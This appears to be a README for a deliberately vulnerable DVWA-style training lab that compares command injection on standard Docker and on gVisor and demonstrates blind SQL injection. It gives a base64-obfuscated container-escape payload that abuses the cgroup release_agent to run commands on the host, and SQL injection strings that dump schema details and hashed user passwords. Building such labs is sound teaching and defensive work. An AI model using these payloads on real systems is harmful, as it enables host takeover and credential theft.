A microservice web app to mimic the features of DVWA. Currently available features : 1) Command Injection (ping) and 2) Blind SQL Injection
docker-compose up -d
The tables must be loaded once the containers have been brought up.
The same command can be used to reset the tables if any sql-injection actions have been performed
- ping [a flask app that executes ping/command injection(Standard Docker)]
- ping-gvisor [a flask app that executes ping/command injection(gVisor)]
- sql-injection [a flask app that connects to mysql container and executes sql commands]
- nginx [an nginx container that hosts the frontend UI]
- mysql [a mysql container. version 5.5.23]
Go to localhost:1234 []
enter payload in ping section: && echo 'cm5kX2Rpcj0kKGRhdGUgKyVzIHwgbWQ1c3VtIHwgaGVhZCAtYyAxMCkKbWtkaXIgL3RtcC9jZ3JwICYmIG1vdW50IC10IGNncm91cCAtbyByZG1hIGNncm91cCAvdG1wL2NncnAgJiYgbWtkaXIgL3RtcC9jZ3JwLyR7cm5kX2Rpcn0KZWNobyAxID4gL3RtcC9jZ3JwLyR7cm5kX2Rpcn0vbm90aWZ5X29uX3JlbGVhc2UKaG9zdF9wYXRoPWBzZWQgLW4gJ3MvLipccGVyZGlyPVwoW14sXSpcKS4qL1wxL3AnIC9ldGMvbXRhYmAKZWNobyAiJGhvc3RfcGF0aC9jbWQiID4gL3RtcC9jZ3JwL3JlbGVhc2VfYWdlbnQKY2F0ID4gL2NtZCA8PCBfRU5ECiMhL2Jpbi9zaApjYXQgPiAvcnVubWUuc2ggPDwgRU9GCnNsZWVwIDMwIApFT0YKc2ggL3J1bm1lLnNoICYKc2xlZXAgNQppZmNvbmZpZyBldGgwID4gIiR7aG9zdF9wYXRofS9vdXRwdXQiCmhvc3RuYW1lID4+ICIke2hvc3RfcGF0aH0vb3V0cHV0IgppZCA+PiAiJHtob3N0X3BhdGh9L291dHB1dCIKcHMgYXh1IHwgZ3JlcCBydW5tZS5zaCA+PiAiJHtob3N0X3BhdGh9L291dHB1dCIKX0VORAoKIyMgTm93IHdlIHRyaWNrIHRoZSBkb2NrZXIgZGFlbW9uIHRvIGV4ZWN1dGUgdGhlIHNjcmlwdC4KY2htb2QgYSt4IC9jbWQKc2ggLWMgImVjaG8gXCRcJCA+IC90bXAvY2dycC8ke3JuZF9kaXJ9L2Nncm91cC5wcm9jcyIKIyMgV2FpaWlpaXQgZm9yIGl0Li4uCnNsZWVwIDYKY2F0IC9vdXRwdXQKZWNobyAicHJvZml0Ig=='|base64 -d|bash -
When payload sent to Standard Docker ping, it returns ps command results from host system.
When payload sent to gVisor ping, it fails to execute as gVisor is secure.
The input is not sanitised so we can execute other instructions.
Try the following commands in the sql injection text box :
1 or '0'='0' union select TABLE_NAME, COLUMN_NAME from information_schema.COLUMNS #
The above command returns all column names of all the tables in each database in the container.1 or '0'='0' union select user, password from dvwa.users #
The above command returns username and md5 hashed password of each user int he uses table.